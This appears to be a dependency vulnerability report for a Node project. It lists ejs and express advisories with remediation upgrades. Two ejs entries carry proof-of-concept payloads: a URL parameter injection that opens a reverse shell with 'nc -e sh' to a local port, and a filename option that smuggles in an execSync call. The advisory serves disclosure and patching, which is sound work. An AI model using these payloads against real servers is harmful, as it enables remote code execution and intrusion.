Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
-
Introduced through: hc-bee@node-honeycomb/hc-bee#d1f467908d8278954349ab45201cde4516b28b52 › ejs@2.7.4Remediation: Upgrade to ejs@3.1.7.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options
parameter of renderFile
, which makes it possible to inject code into outputFunctionName
.
Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.
PoC:
Creation of reverse shell:
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
Remediation
Upgrade ejs
to version 3.1.7 or higher.
References
medium severity
- Vulnerable module: express
- Introduced through: express@4.18.2
Detailed paths
-
Introduced through: hc-bee@node-honeycomb/hc-bee#d1f467908d8278954349ab45201cde4516b28b52 › express@4.18.2Remediation: Upgrade to express@4.19.2.
Overview
express is a minimalist web framework.
Affected versions of this package are vulnerable to Open Redirect due to the implementation of URL encoding using encodeurl
before passing it to the location
header. This can lead to unexpected evaluations of malformed URLs by common redirect allow list implementations in applications, allowing an attacker to bypass a properly implemented allow list and redirect users to malicious sites.
Remediation
Upgrade express
to version 4.19.2, 5.0.0-beta.3 or higher.
References
medium severity
new
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
-
Introduced through: hc-bee@node-honeycomb/hc-bee#d1f467908d8278954349ab45201cde4516b28b52 › ejs@2.7.4Remediation: Upgrade to ejs@3.1.10.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources due to the lack of certain pollution protection mechanisms. An attacker can exploit this vulnerability to manipulate object properties that should not be accessible or modifiable.
Note:
Even after updating to the fix version that adds enhanced protection against prototype pollution, it is still possible to override the hasOwnProperty
method.
Remediation
Upgrade ejs
to version 3.1.10 or higher.
References
medium severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
-
Introduced through: hc-bee@node-honeycomb/hc-bee#d1f467908d8278954349ab45201cde4516b28b52 › ejs@2.7.4Remediation: Upgrade to ejs@3.1.6.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Arbitrary Code Injection via the render
and renderFile
. If external input is flowing into the options
parameter, an attacker is able run arbitrary code. This include the filename
, compileDebug
, and client
option.
POC
let ejs = require('ejs')
ejs.render('./views/test.ejs',{
filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
compileDebug: true,
message: 'test',
client: true
})
Remediation
Upgrade ejs
to version 3.1.6 or higher.